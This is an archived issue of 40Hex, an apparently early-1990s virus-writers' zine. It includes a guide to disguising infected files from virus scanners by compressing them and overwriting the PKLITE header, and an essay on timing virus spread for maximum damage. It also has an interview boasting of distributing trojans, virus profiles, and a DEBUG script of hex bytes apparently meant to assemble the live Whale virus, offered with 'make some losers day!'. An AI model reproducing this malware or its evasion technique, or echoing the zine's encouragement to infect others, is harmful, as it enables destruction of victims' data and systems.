HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / 40HEXX.ZIP / 40HEX002 < prev next >

Wrap

Text File | 1998-01-21 | 128.2 KB | 3,126 lines

40Hex Volume 1 Issue 2 0000 001...............................How to sneak infected files into past SCAN. 002...............................The safe way to play with viruses. 003...............................Theory Dept. Viruses Slow vs. Fast. 004...............................Interview of the month: Skism One. 005...............................Artical on The Dark Avenger. 006...............................The mother of all viruses - WHALE! 007...............................And now a word from a real dick. 008...............................The Ontario Virus. 009...............................The 1260 Virus. 010...............................The Skism 808 source code. 011...............................Vienna/Violator source code. 40Hex Staff Hellraiser....................Editor/Programming Consultant ETC... Nick Haflinger -=PHALCON=-....CO-Editor/Writer/Theory Consultant Skism One.....................Virus supply/Co-Programming Consultant The Punisher (Brooklyn).......Virus supply Garbage Heap..................Main Virus Supply/Overseer Spell Checker.................Obvoiusly there is none Call the 40HEX/SKISM Homebase ----- The Landfill BBS (914)-HAK-VMBS Sysop Garbage Heap. Home of -=PHALCON=- 40Hex wants YOU - The write articles for this mag. Lets make it world wide! Send any articles to the 40Hex HQ - The Landfill BBS! Special shout out to - Sub-Zero (the hard core group), DC Wave, all the kids at school. 40Hex Volume 1 Issue 2 0001 - HOW TO GET INFECTED FILES INTO LAME BBS's - Ok, one problem with sending infected files to BBS's is that you never can tell if they will be detected by SCAN. Or if you are sending bombs the sysop might use CHK4BOMB to detect code that is data damaging. I'm gonna tell you how to get around this, what you need is the following- PKLITE or LZEXE and A good hex editor What you do is this, compress the infected file with Pklite or Lzexe. This will make change the files checksum and ID strings quite a bit so it can't be detected by SCAN and damaging data will not be found by CHK4BOMB. The problem is that now the sysop can use CHK4LITE to detect is the file is indeed infected. So what you do is this -- Load up the hex editior - Now look at the file, it will look something like this if you compressed it with PKLITE. ------------------------------------------------------------------------------ 0000 4D 5A 12 01 13 00 00 00-07 00 98 05 4A A4 52 02 MZööööööööööJöRö 0010 00 04 00 00 00 01 F0 FF-50 00 00 00 03 01 50 4B ööööööööPöööööPK 0020 4C 49 54 45 20 43 6F 70-72 2E 20 31 39 39 30 20 LITE Copr. 1990 0030 50 4B 57 41 52 45 20 49-6E 63 2E 20 41 6C 6C 20 PKWARE Inc. All 0040 52 69 67 68 74 73 20 52-65 73 65 72 76 65 64 00 Rights Reservedö 0050 0A 00 20 00 17 01 48 00-4A 04 4A A4 E2 03 00 40 öö öööHöJöJöööö@ 0060 00 00 56 11 00 00 1C 00-00 00 00 00 00 00 00 00 ööVööööööööööööö 0070 B8 E3 07 BA 4B 02 8C DB-03 D8 3B 1E 02 00 73 1D ööööKööööö;ööösö 0080 83 EB 20 FA 8E D3 BC 00-02 FB 83 EB 19 8E C3 53 öö ööööööööööööS 0090 B9 C3 00 33 FF 57 BE 48-01 FC F3 A5 CB B4 09 BA ööö3öWöHöööööööö 00A0 36 01 CD 21 CD 20 4E 6F-74 20 65 6E 6F 75 67 68 6öö!ö Not enough 00B0 20 6D 65 6D 6F 72 79 24-FD 8C DB 53 83 C3 2D 03 memory$öööSöö-ö 00C0 DA BE FE FF 8B FE 8C CD-8B C5 2B EA 8B CA D1 E1 öööööööööö+ööööö ------------------------------------------------------------------------------ You see the header? Well what you have to do is overwrite the header with garbage. Don't write text cause that is to dectectable by a dump program. Just overwrite the part that says "PKLITE corp....Reserved" with hex bytes. Also distroy the part of the code that says "Not enough memory", dont kill the "$" symbol. This will make the compressed file- A> Undetectable to virus scanners, and CHK4BOMB type programs B> Un-Decompressable C> CHK4LITE wont notice it as a PKLITE file It's that easy! Keep in mind however than any file that the virus infects will no longer be encrypted by PKLITE, so this method is good only on getting your virus into the front door. See the article in issue one on making new virus strains. Forenote After writing this article SCAN Version 80 came out, It now has the ability to scan into Pklite compressed files. Just to let you know that this teqnique still works and SCAN cannot detect the file as being compressed as PKLITE. HR 40Hex Volume 1 Issue 2 0002 THE SAFE WAY TO EXPERIMENT WITH VIRUSES The problem with fooling around with viruses is that you never know what damage there going to do to your hard disk. I have a couple of so called viruses that when run, automatically screw up the FAT on all the disks in the system. Well, theres a way around getting the shaft from these programs, and also to experiment with legitament viruses. The key is the DOS utitlity SUBST, make this batch file, and copy it to a floppy. ------------------------------------------------------------------------------ @echo off subst d: a:\ subst c: a:\ ------------------------------------------------------------------------------ What this will do is send any access to disks C: and D: (the two hard disks in my case) to drive A: So the only damage inflicted will be to the floppy in A: No programs can access you hard disk when this command is issued. I use it all the time and as of now it has proved 100% safe. Oh yeah, if you dont feel like distroying a floppy every time you mess with a virus, you can do this teqnique from a RAM disk. Have fun... HR 40Hex Volume 1 Issue 2 0003 Virus Spreading - Fast Or Slow? By Nick Haflinger -=PHALCON=- Call The LandFill BBS (914) Hak-Vmbs -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- One of the questions while writing your virus is how quickly you want it to spread. The easy answer is "As fast as possible" but this is not always the best answer. If a virus moves slowly, it will take much longer before somebody notices hard drive space disappearing, he/she will notice fewer changes to the file dates, and all other symptoms will be lessened. However, this does provide longer for anti-virus people (pronounced Scum, with a capital S) to discover the virus. This issue ties directly into the issue of activation, short or long. Since the issues are virtually identical, I will cover both together, because they are so closely tied. The Case For Fast ================= Viri should spread as quickly as possible. This allows as little time as possible for the makers of antivirus programs to come up with an antidote before the virus is widely spread. This should be tied with a short activation period to cause as many problems as possible before detection is possible. Because fewer copies are generated before activation, each copy may be larger. This allows for more extensive anti-anti-viral tactics, which are becoming increasingly more important as the number of anti-viral products rises. Just remember, most of these products are shit. So don't worry too much. The Case For Slow ================= Viri should spread slowly, because this is less obtrusive, and therefore users are less likely to notice a change in the system. This should be coupled with a long activation period as to have maximum penetration before the virus activates. A slow-spreading virus will circulate to more virus programmers who will be able to modify the program for specific needs or to adapt to antiviral tactics. On a purely academic note, slow spreading viri must be smaller, as more copies must be generated. This means that viri must be programmed better, which is good for the general community. The Case Against Fast ===================== Fast spreading of viri is likely to draw attention. Once a virus has been caught, in most of the cases, it is dead and useless. A virus should infect the greatest area in the shortest time before the anti-virus people inevitably catch up to the virus. However, because of the necessity of a short activation time, this virus has a lesser range than a slow-spreading virus. The programmer must rely on either (a) the quick distribution of the virus along at least a regional level --or-- (b) the ability of other virus programmers to obtain and modify either the source code or dissassemble and modify the distributed virus. If possible, the source should be distributed along trusted channels. There should be as little chance as possible of an antiviral researcher obtaining a copy of the sourse for your masterpiece. The Case Against Slow ===================== A slow spreading virus is much more likely to get caught by antiviral people prior to its necessarily long pre-activation period. There will be more defenses out against the virus before it has spread much. However, if the virus is well-done, it will have spread far before it is caught. Conclusion ========== Actually, I lied. There is no conclusion to be drawn from this, as this is in itself the conclusion of long hours of thought and much brainstorming on BBSs. If you would like to comment, I can be reached on LandFill BBS, phone number above. In a future article, I will attempt to cover anti-anti-virus tactics. I may also respond to some important questions/comments I may recieve. Start your viri now! And may the best bug win! NH 40Hex Volume 1 Issue 2 0004 Interview with Skism One - AKA Lord SSS (triple S) This interview was taken by Hellraiser on July 7, 1991 in Washington Square Park, Manhatten. HR: So what got you started in the virus business? SSS: Well, I used to write graffiti all over and that got sort of played out, so I needed something else distructive to do. So I started getting into computers, then the next thing you know I'm writing viruses. HR: What was you first experence with viruses? SSS: Well the first time I heard of them was when that dickhead got arrested for putting the worm... HR: You mean Morris? SSS: Yeah that asshole, it was on the news and all that - so I got to thinking, that would be a cool thing to do. HR: What was the first virus you ran across? SSS: Ha... Some dick gave me a copy of (pause) it think it was Norton 4.0 when it first came out. So I took it home and put it on my hard drive. The next thing you know all this weird shit starts going on. Like programs won't run and this little box opens up on the bottom of my screen all of a sudden. So I get a copy of SCAN, then I find out almost all my files are infected with Jerusalem. HR: What did you do? SSS: Well I re-formatted the drive and examined the copy of Jeru for months. Then one day I used a Hex editor to change the suMSDOs string to SKISM-1. Then I went to all the computers I could find and infected them. The next thing you know my friend shows me this list with my name on it. It was Patti Hoffmans document. Shit, I thought I was the man back then. HR: Then what? SSS: Then - well I got into assembler and dissasembly and I started to learn how to modify the code and all that. The next thing you know I had made my own virus from the scraps of Jeru. HR: Captian Trips, right? SSS: Yeah, sort of. Then someone I know sent it to all the boards in town under a trojan name and fucked a lot of peoples shit up. Oh well. Then I guess I grew out of the scavenger mode and started writting my own shit, from scratch. HR: Like what? SSS: Well they were all called Skism so and so, like Skism 10, Skism 11 and all that. Then I meet people and they started helping me out and now we got this thing going on. HR: You mean Smart Kids Into Sick Methods? SSS: Yeah, you know all thid did did dat. HR: How do you name your viruses? SSS: Well depends whats on my mind. Skism was my tag for like four years, so I thought it would be cool if people saw my name in the newspaper and all that. I got Captian Trips after reading The Stand, by Stephen King. 1992 was just what I named it cause the virus came out to be about 1945 bytes so I jusy padded it out to next years date. 808 was named after the TR-808, a 'drum machine' used in hip-hop. HR: Whats the latest projects? SSS: You know, you wrote most of the shit. HR: Tell them. The people. SSS: Well, we did SKISM 1992, which was funny, then a member of SKISM, who shall be nameless made 808. Now I'm just taking a break from viruses and computers for the summer. HR: You stopped? SSS: Your crazy, nah - It's got to wait a while, then I'll get back into it - when school starts again. HR: What do you think of McAffe? SSS: He's cool, what the fuck am supposed to say. He does a good job at spreading my name around. I really like Pat Hoffman, thanks for the write ups. You got to understand - these people make us into infamous villians. I can deal with that. HR: Do you mind them detecting your viruses? SSS: Nah, fuck it - If my shit can make it from NY to California without effort, it shows it works. Thats it. Thers a lot more where that came from. One more thing, I hate that gay bitch Ross Greenburg author of Flu-Shot. What a dick. He's just an asshole tring to sell his shit product. He's got a big mouth and instead of crashing his board, I'd like to kick his fucken ass. Where's his office? Up one 57th right? Lets take a walk. Just kiddin' but the guys product sucks and he's just a greedy asshole. I'm glad I sent a trojan version of his virus scanner around. Ha you dick! HR: What virus authors do you look up to? SSS: Myself - Ha Ha (laughter) Ha Ha. No, I love Whale - that was clever. I like Dark Avenger, the real one. Its hard to be original, and these guys were. Hats off you crazy fuckin' Bulgarian Metal-Head! HR: What about groups of virus writers? SSS: I think were the only one. Oh yeah and those Rabid people you told me about, yeah there just like us - people tring to make there mark in the world, or should I say dent in the world. Germans are bugging out too - Shit, they write half the shit out there these days. More power to them HR: What is your advise to people who want to write viruses? SSS: Get a late pass! No as I said more power to you. Just remember you got to have style and learn to be ORIGINAL. HR: What next from you? SSS: I don't really know. I'm waiting to hook up a few more people to the pack, then we'll get the thing rollin HARD. Till then 'A little at a time...' At the time this artical was finished, the Skism team was at work on a new virus code named Bad Brains. HR 40Hex Volume 1 Issue 2 0005 The Dark Avenger --- ---- ------- Part I. The Dark Avenger ------------------------- Introduction: The following text file was sent directly to Professor Vesselin Bontchev in a public sent to an anti-viral board located in Sofia, Bulgaria. Bontchev is one of the leading anti-viral researchers in Europe today. A producer of number of effective anti-viral programs in Bulgaria, his programs are widely used throughout Europe. The Dark Avenger is Bulgaria's most dangerous viral code writer and a heavy metal fanatic - as this message concerning himself, written by him (often referring to himself in third person) reveals: ---------------- DARK AVENGER ============ DARK AVENGER is the pseudonym used by a particularly prolific and malicious Bulgarian virus writer. It is also the name given in the West to some of his earlier viruses. His viruses include: DARK AVENGER V651, V1800, V2000 and V2100 NUMBER OF THE BEAST aka 512 (several versions) ANTHRAX (Infects both files and boot sectors) V800 and its derivatives: 1226, PROUD, EVIL & PHOENIX Some other viruses, e.g. NOMENKLATURA & DIAMOND are in his style but are believed to be the work of others. MURPHY has been strongly influenced by him but is known to be of different authorship. CRAZY EDDIE may also be his. Several 'hacks' are now appearing of V1800, V2100, MURPHY and DIAMOND. ************* more ********** Eddie is the mascot of the British heavy metal group, Iron Maiden (hence 'up the irons'). It is a 20 foot high skeleton that appears on stage with them and is featured on the sleeves of all their albums. Anthrax and Damage Inc are other heavy metal groups whose names have been featured in some Dark Avenger viruses. Iron Maiden numbers have also been mentioned including 'Somewhere in Time', 'Only the Good Die Young' and 'Number of the Beast'. ************** more ********** Unusually, this virus writer has also produced a virus removal program together with a version log of his EDDIE series, as reproduced below with its original spelling and grammar. "DOCTOR QUICK! Virus Doctor for the Eddie Virus Version 2.01 10-31-89 Copyright (c) 1988-89 Dark Avenger. All rights reserved. DOCTOR /? for help It may be of interest to you to know that Eddie (also known as "Dark Avenger") is the most widespread virus in Bulgaria for the time being. However I have information that Eddie is well known in the USA, West Germany and USSR too. I started in writing the virus in early September 1988. In those times there were no any viruses in Bulgaria, so I decided to write the first Bulgarian virus. There were some different Eddie's versions: VERSION 1.1, 16-DEC-1988 In December I've decided to enhance the virus. This version could infect files during their opening. For that reason, a read buffer was allocated in high end of memory, rather than using DOS function 48h when needed. The disk was destroyed instead of the infected files. VERSION 1.2, 19-DEC-1988 This added a new feature that causes (for example) compiled programs to be infected at once if the virus is resident. Also, the "Eddie lives..." message was added (can you guess why exactly "Eddie"?) VERSION 1.31, 3-JAN-1989 This became the most common version of Eddie. A code was added to find the INT 13 rom-vector on many popular XT's and AT's. Also, other messages were added so its length would be exactly 1800 bytes. There was a subsequent, 1.32 version (19-JAN-1989), which added self-checksum and other interesting features that was abandoned because it was extremely buggy. In early March 1989 version 1.31 was called into existence and started to live its own life to all engineers' and other suckers' terror. And, the last VERSION 1.4, 17-OCT-1989 This was a bugfix for version 1.31, and added some interesting new features. Support has been added for DOS 2.x and DOS 4.x. For further information about this (the most terrible) version, and to learn how to find out a program author by its code, or why virus-writers are still not dead, contact Mr. Vesselin Bontchev (All Rights Reserved). So, never say die! Eddie lives on and on and on... Up the irons!" NOTE: Vesselin Bontchev, who the Dark Avenger is trying to discredit, is a leading virus researcher at the Bulgarian Academy of Sciences. Post Note: There is a rumor concerning the fact that RABID now has the Dark Avenger on their staff of virus writers, and that the new Dark Avenger variant released by them was, in fact, written by him. This has yet to be proven. The more acceptable belief concerning this new strain is that RABID simply picked up the source code for Dark Avenger, released last December, and modified it. Part II - Dark Avenger - Strain A ----------------------- Vesselin Bontchev reports in May 1990: The Dark Avenger virus. ====================== - I found two new mutations of this virus. Well, maybe "mutations" is not the correct word. In the first of them, the first 16 characters of the string "Eddie lives... somewhere in time!" were replaced with blanks. In the second example, all strings (the message above, the copyright message and the "Diana P." string) were replaced with blanks. - The author of the Dark Avenger virus (The bastard! I still cannot determine who he is.) has released the source code of his virus. It is full with ironic comments about me. Of course, now we have to expect lots of new, similar viruses to appear. At least, this leaded to one good thing - the source helped me very much in disassembling the V2000 virus. - I received a rather offensive anonymous letter from this person. In it he claims to be also the author of both the V2000 (I trust this) and the Number of the Beast viruses (the latter is unlikely). [See Above] Information About the Dark Avenger Virus, courtesy of "Virus Bulletin Ltd," Buckinghamshire, England. Note: This information is far more valuable than the standard Virus Summary by Patricia Hoffman. Her entry concerning DA fails to go into more depth about the Dark Avenger virus and apparently she has yet to receive information of the different versions of DA. Such information is already a year old, but she has yet to include it. Entry...............: Dark Avenger Alias(es)...........: --- Virus Strain........: Dark Avenger Virus detected when.: November 1989 where.: USA Classification......: February 1990 Length of Virus.....: about 1800 Bytes --------------------- Preconditions ----------------------------------- Operating System(s).: DOS Version/Release.....: Computer model(s)...: IBM-compatible --------------------- Attributes -------------------------------------- Easy Identification.: Two Texts: "Eddie lives...somewhere in time" at beginning and "This Program was written in the City of Sofia (C) 1988-89 Dark Avenger" near end of file Type of infection...: Link-virus COM-files: appends to the program and installs a short jump EXE-files: appends to the program at the beginning of the next paragraph Infection Trigger...: COM and EXE files are corrupted on any read attempt even when VIEWING!!! Storage media affected: Any Drive Interrupts hooked...: Int 21 DOS-services Int 27 Terminate and Stay Resident Damage..............: Overwrites a random sector with bootblock Damage Trigger......: each 16th infection; counter located in Bootblock Particularities.....: - Similarities........: - --------------------- Agents ------------------------------------------ Countermeasures.....: NONE! All data can be destroyed !!!! There is no way in retrieving lost data. Backups will most probably be destroyed too. Countermeasures successful: install McAfee's SCANRES. Standard means......: Good luck! Hopefully the virus did not destroy too many of your programs and data. --------------------- Acknowledgement --------------------------------- Location............: VTC Uni Hamburg Classification by...: Matthias Jaenichen Documentation by....: Matthias Jaenichen Date................: 31.01.1990 Part III - DARK AVENGER 2000 ================= Date: 02 Feb 90 10:49:00 +0700 From: Vesselin Bontchev This virus is also "made in Bulgaria" and again I am indirectly the cause of its creation. I am a well known "virus-buster" in Bulgaria and my antivirus programs are very widely used. Of course, virus designers didn't like it. So their next creation... causes trouble to my antivirus programs. This virus is exactly 2000 bytes long and I think that it was created by the author of the Eddie (Dark Avenger) virus. The programming style is the same and there are even pieces of code which are the same. The virus acts much like the Eddie one --- it installs resident in memory by manipulating the memory control blocks; infects COMMAND.COM at the first run; infects both .COM- and .EXE-files; infects files when one executes them as well as when one copies them. However, there are some extras added. First, the virus is able to fetch the original INT 13h vector just like the V512 one (by using the same undocumented function --- tricks spread fast between virus programmers). Second, it intercepts the find-first (FCB) and find-next (FCB) functions --- just like V651 (aka EDDIE II) (and contains the same bugs), so you won't see the increased file lengths in the listing displayed by the DIR command. Third, it contains the string "Copyright (C) 1989 by Vesselin Bontchev", so people may think that I am the author of this virus. In fact, the virus searches every program being executed for this string (the case of the letters does not matter) and if found, hangs the system. It is not necessary to tell you that all my antivirus programs contain this string. Of course, now I will have to use some kind of encryption, just to prevent such tricks. Vesselin Bontchev reported in May 1990: The V2000 virus (DARK AVENGER 2000) =================================== - It turned out that the example of this virus I sent to some of the antivirus researchers was not the original version. The original contains the string "Only the Good die young..." instead of the "Copy me - I want to travel" message. Also a small piece of code in the original version was patched to contain the "666" string. (That is, the version you have contains this string, the original does not.) - There exists also a small mutation of the version you have. The only difference is that the `C' character in the word "Copy" was changed to `Z'. - When describing the V2000 virus, I stated that it halts the computer if you run a program which contains the string "Copyright (c) 1989 by Vesselin Bontchev". This is not quite correct. In fact, the programs are only checked for the "Vesselin Bontchev" part of the string. - I obtained John McAfee's program Clean, version 60. In the accompanying documentation he states about the V2000 virus that "The virus is very virulent and has caused system crashes and lost data, as well as causing some systems to become non-bootable after infection". This is not very correct, or at least, there is much more to be said. The virus is exactly as virulent as the Dark Avenger virus, and for the same reason. It infects files not only when one executes them, but also when one reads or copies them. This is achieved exactly in the same manner as in the Dark Avenger. The systems become non-bootable when the virus infects the two hidden files of the operating system - it cannot distinguish them from the regular .COM files. By the way, the Dark Avenger virus often causes the same effect. And at last, but not least (:-)), the virus is highly destructive - just as the Dark Avenger is. It destroys the information on a randomly selected sector on the disk once in every 16 runs of an infected program. The random function is exactly the same, and the counters (0 to 15 and for the last attacked sector) are exactly the same and on the same offsets in the boot sector as with the Dark Avenger virus. The main difference is that the destroyed sector is overwritten not with a part of the virus body, but with the boot sector instead. This makes a bit more difficult to discover which files are destroyed - the boot sector is contained in many "good" programs, such as FORMAT, SYS, NDD. Also, the nastiest thing - the damage function is not performed via INT 26h (which can be intercepted). The virus determines the address of the device driver for the respective disk unit (using an undocumented DOS function call, of course. I begin to wonder if Ralf Brown did any good when he made the information in the INTERxyy file available :-)). Then it performs a direct call to that address. The device driver in DOS does its work and issues the appropriate INT 13h. However the virus has scanned the controllers' ROM space and has determined the original address of the interrupt handler - just as the Dark Avenger virus does. Then it has temporary replaced the INT 13h vector with the address of this handler. The result is that the damage function cannot be intercepted. - Also this virus (unlike Dark Avenger) supports PC-DOS version 4.0 and will work (and infect) under it. - The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the name "Diana P.", this time written in cyrillics. Unknown Source 40Hex Volume 1 Issue 2 0006 The Whale Virus Oh yes here it is, the biggest and meanest virus around. First before you go and compile it read what Patti thinks of it. Aliases: Mother Fish, Stealth Virus, Z The Whale V Status: Research Discovered: August, 1990 Symptoms: .COM & .EXE growth; decrease in available memory; system slowdown; video flicker; slow screen writes; file allocation errors; simulated system reboot Origin: Hamburg, West Germany Eff Length: 9,216 Bytes Type Code: PRhA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+, NAV, IBM Scan 2.00+ Removal Instructions: Scan/D, CleanUp V67+, Pro-Scan 2.01+, or Delete infected files General Comments: The Whale Virus was submitted in early September, 1990. This virus had been rumored to exist since the isolation of the Fish 6 Virus in June, 1990. It has been referred to by several names besides Whale, including Mother Fish and Z The Whale. The origin of this virus is subject to some speculation, though it is probably from Hamburg, West Germany due to a reference within the viral code once it is0*0*0*ùù╒ε decrypted. The first time a program infected with the Whale Virus is executed, the Whale will install itself memory resident in high system memory but below the 640K DOS boundary. On the author's XT clone, the virus always starts at address 9D90. Available free memory will be decreased by 9,984 bytes. Most utilities which display memory usage will also indicate a value for total system memory which is 9,984 bytes less than what is actually installed. The following text string can be found in memory on systems infected with the Whale virus: "Z THE WHALE". Immediately upon becoming memory resident, the system user will experience the system slowing down. Noticeable effects of the system slowdown include video flicker to extremely slow screen writes. Some programs may appear to "hang", though they will eventually execute properly in most cases since the "hang" is due to the slowing of the system. When a program is executed with the Whale memory resident, the virus will infect the program. Infected programs increase in length, the actual change in length is usually 9,216 bytes. Note the "usually": this virus does occasionally infect a program with a "mutant" which will be a different length. If the file length increase is exactly 9,216 bytes, the Whale will hide the change in file length when a disk directory command is executed. If the file length of the viral code added to the program is other than 9,216 bytes, the file length displayed with the directory command will either the actual infected file length, or the actual infected file length minus 9,216 bytes. Executing the DOS CHKDSK program on infected systems will result in file allocation errors being reported. If CHKDSK /F is executed, file damage will result. The Whale also alters the program's date/time in the directory when the file is executed, though it is not set to the system date/time of infection. Occasionally, Whale will alter the directory entry for the program it is infecting improperly, resulting in the directory entry becoming invalid. These programs with invalid directory entries will appear when the directory is listed, but some disk utilities will not allow access to the program. In these cases, the directory entry can be fixed with Norton Utilities FD command to reset the file date. The Whale occasionally will change its behavior while it is memory resident. While most of the time it only infects files when executed, there are periods of time when it will infect any file opened for any reason. It will also, at times, disinfect files when they are copied with the DOS copy command, at other times it will not "disinfect on the fly". Occasionally, the Whale Virus will simulate what appears to be a system reboot. While this doesn't always occur, when it does occur the Break key is disabled so that the user cannot exit unexpectedly from the execution of the system's AutoExec.Bat file. If the AutoExec.Bat file contained any software which does file opens of other executable programs, those opened executable programs will be infected at that time if they were not previously infected. Typically, files infected in this manner will increase by 9,216 bytes though it will not be shown in a directory listing. A hidden file may be found in the root directory of drive C: on infected files. This file is not always present, the virus will sometimes remove it, only to recreate it again at a later time. The name of this hidden file is FISH-#9.TBL, it contains an image of the hard disk's partition table along with the following message: "Fish Virus #9 A Whale is no Fish! Mind her Mutant Fish and the hidden Fish Eggs for they are damaging. The sixth Fish mutates only if the Whale is in her Cave." After the discovery of this hidden file, the author of this document made several attempt to have the Fish 6 Virus mutate by introducing it and Whale into a system. Under no circumstances did a mutation of either virus result, the resultant files were infected with both an identifiable Fish 6 infection and a Whale infection. Whale is hostile to debuggers and contains many traps to prevent successful decryption of the virus. One of its "traps" is to lock out the keyboard if it determines a debugger is in use. Here's a side note by the author of F-Prot Whale This is a recent, rather remarkable virus. It is long, 9216 bytes and able to infect COM and EXE files. The increase in file size is not visible though, while the virus is active in memory, as it uses several advanced "stealth" methods. Other effects of the virus are not known, but one infected program displayed the following message when run: THE WHALE IN SEARCH OF THE 8 FISH I AM '~knzyvo}' IN HAMBURG addr error D9EB,02 Most of the virus is devoted to encryption and code which moves blocks of virus code around. This overhead results in a considerable slowdown of infected systems. And here it is. Use your editor to copy the below machine language script to a file called WHALE.SCR Next use DEBUG to make it into a COM file. Use the command DEBUG < WHALE.SCR When it gets done you'll see a file called WHALE.COM. There it is, have fun - and make some losers day! ------------------------------------------------------------------------------ n whale.com e 0100 E9 C9 23 01 F5 21 E1 02 C0 00 D2 07 FF FF 99 14 e 0110 00 E9 B8 23 CD 20 8D 01 BD 00 E1 02 C0 00 D2 07 e 0120 FF FF 99 14 FE FF E3 8F 01 00 99 14 1E 00 00 00 e 0130 26 FB 5A 26 47 48 63 33 57 6E 52 4C 63 3D FF 10 e 0140 D4 06 75 EC 06 7E 17 75 25 FA 03 24 3D 8B 21 90 e 0150 C3 24 67 2A 08 12 07 C4 E0 5B 08 9C 06 E1 15 66 e 0160 03 7B 25 7D D4 06 4E 36 9C 08 90 C3 24 D4 06 4C e 0170 36 FF 38 D4 06 4A 36 35 02 40 C7 20 7D 25 E5 13 e 0180 C7 20 48 25 26 34 C3 77 3D 8B 29 3D 8B 38 48 81 e 0190 E5 5C 01 BA 1D 53 AF CD CF CF 22 02 D9 A7 29 27 e 01A0 4A 2E D9 14 2E 05 24 5F D5 B7 EB 38 1D 1F CE BF e 01B0 FF CC 4B BB 11 1B 81 11 06 EF A5 D0 02 A7 24 68 e 01C0 63 AD 0A 07 0C E8 A2 14 E8 5E 1A 38 38 E5 68 30 e 01D0 23 BD DB 29 AA 6A 23 92 26 48 3A F5 2C 38 B3 4A e 01E0 E0 16 AE 59 1C 03 01 88 2C F6 F5 0E 92 3E 22 3A e 01F0 B1 13 33 1C B7 D8 19 BD 1F FE 0B 4E 1C 0D F6 53 e 0200 0E F6 BD 2D 27 CE 28 09 1C D3 5C BE DE C0 E7 83 e 0210 5D 7A 67 A1 19 CD ED C2 4F 98 C3 2C 3E B6 4E 04 e 0220 D8 FE E4 6A D5 F7 C2 15 C6 AD F7 2A 21 D5 8C C2 e 0230 85 E2 6F ED F5 C2 5F CE A8 F7 28 B6 D3 28 29 D1 e 0240 28 A0 F3 FB CE 9A 1E CE EA 08 14 69 29 5A D9 73 e 0250 B4 0F 79 72 E5 7C D9 4C 54 D5 77 F9 79 47 BC 5A e 0260 19 5F B6 47 F6 52 1A 5F 72 AE 7C 2D 4C 09 7E 81 e 0270 2F 7D 6E 21 72 AF 7C DB 4C 7A B4 65 5A 6F D0 E9 e 0280 01 09 EA A7 FD 73 27 FA 8B 23 9A F3 CE FB B3 2E e 0290 3D C4 52 F8 2C C0 D4 48 21 F9 FD FC 90 E0 91 CB e 02A0 2C 69 C9 EA 6C C9 EB C6 F9 3B D4 FA E0 B8 67 D7 e 02B0 0A 6E C6 D1 0C 4A 39 11 C2 97 D3 C6 0A 1D DB CD e 02C0 D0 E8 59 1B 39 5E 83 3E 5C 45 F4 50 25 5C B6 55 e 02D0 7A 50 74 66 59 83 17 A1 AD 7E D2 4E 78 B6 CD 7F e 02E0 FF 2E 5C D0 AB 5E 9B 7D 72 5E E5 A0 5B 7B 78 70 e 02F0 6A 7E 44 6B 56 DE 55 58 5E 6B 83 B6 E0 67 64 66 e 0300 2D CE 2C 08 01 E3 DE 77 E7 F0 75 E3 F1 F8 42 F6 e 0310 D6 40 F2 D7 CD 51 DE E3 53 D2 E2 DE 29 D5 B5 F2 e 0320 D0 30 28 27 A0 F8 42 13 F2 0B AD C9 CB CB CE 01 e 0330 08 31 25 18 11 23 24 10 0B 97 F3 01 18 9B 03 22 e 0340 10 0B B8 06 37 36 F8 65 29 08 3D FF 08 0B 00 76 e 0350 AB 00 26 9D D8 7E 98 1E E1 15 89 38 1F 00 AA 1D e 0360 0E 26 FB 55 15 C8 89 C3 9D DB A7 75 06 D9 ED A3 e 0370 22 13 8C 28 1D 00 AF 25 0C 26 FB 5B 24 FA F2 28 e 0380 AD BB 8D F8 EF 89 A8 EF 8D B8 BF 99 FC AB CD B8 e 0390 AB 99 F8 EF CD B8 AB DD B8 EB 99 A8 BF 8D F8 2E e 03A0 A6 1C AB C4 EA E8 F6 0D 51 A0 99 62 44 F8 A7 C8 e 03B0 B9 D9 54 71 95 A7 28 E3 AD EC 60 47 B0 E1 96 71 e 03C0 95 B7 21 DA DF 71 32 CD 99 8A CE 6F CB 92 10 8B e 03D0 FE FA E8 26 13 5B A5 F8 72 75 9C 06 22 13 0E A9 e 03E0 15 06 26 1D 58 2B 55 F3 76 8E D7 AC EB 01 ED FA e 03F0 BF 3A 98 07 AD 0B 33 E6 9D D8 CD FB 45 21 30 B8 e 0400 CD 20 64 A8 20 E7 98 85 31 80 18 9C C5 FE 31 7B e 0410 43 8B 98 43 CD 9F 43 4E 9E 43 03 9E 43 A5 9F 43 e 0420 DF 80 8F E8 3B 14 5A CB 16 FC CA D0 2A CD 66 C8 e 0430 B0 FD 56 FE FD 54 C4 FE C3 F3 D9 99 FE 7D 2E C8 e 0440 1C 1B 22 C8 ED C4 67 EB DA 0A E9 D9 0A E9 DF 1E e 0450 EB EA 34 EB E8 31 E5 EC 36 EB F6 68 E4 F5 1A E4 e 0460 F4 A0 F3 89 5C F0 80 B3 E7 85 8E F2 84 8E F2 9C e 0470 F1 F0 88 D0 12 FC D0 62 CD 66 C8 23 C2 ED 23 F6 e 0480 F3 90 3D FF 00 8B 25 70 FA 90 3B FA 65 3B 50 41 e 0490 17 1C 39 29 64 E8 8D 15 1B 7A A7 B2 7A A7 33 7A e 04A0 A7 68 7A C6 B9 54 B0 6A C9 6B D3 3C 49 01 92 9A e 04B0 59 92 9A 41 66 DC D7 1A EC 75 CE 95 06 34 6D 50 e 04C0 D7 6B 94 7C 6A 61 07 33 24 01 36 26 C5 85 C7 45 e 04D0 7E 2E D9 35 EA 02 E5 E8 4F 15 28 44 5F EB 62 26 e 04E0 47 6A FD 74 1D 54 6C 53 5F E9 62 2A 47 6A 99 AB e 04F0 BB 5F EC 52 28 47 6A F8 44 1F 54 4C CF 57 35 61 e 0500 99 E4 59 58 C3 98 BC 34 28 48 53 7C 41 8F 20 FB e 0510 31 20 0F 26 BE 7E 02 2E F1 18 35 11 28 1F C9 9F e 0520 05 35 8A 26 B3 23 88 71 D9 47 D7 D0 E8 6F 3B 1D e 0530 D0 33 E7 50 26 2F 14 E2 DE 98 D9 CE FB 04 20 01 e 0540 45 4D D9 43 89 72 D9 33 05 14 31 00 12 7D 50 AD e 0550 54 4B 56 08 EC 26 CC 37 E8 CE 16 0E B2 37 95 BC e 0560 98 2E 74 A6 7C B7 87 7C AD 9A 9B E5 FB D4 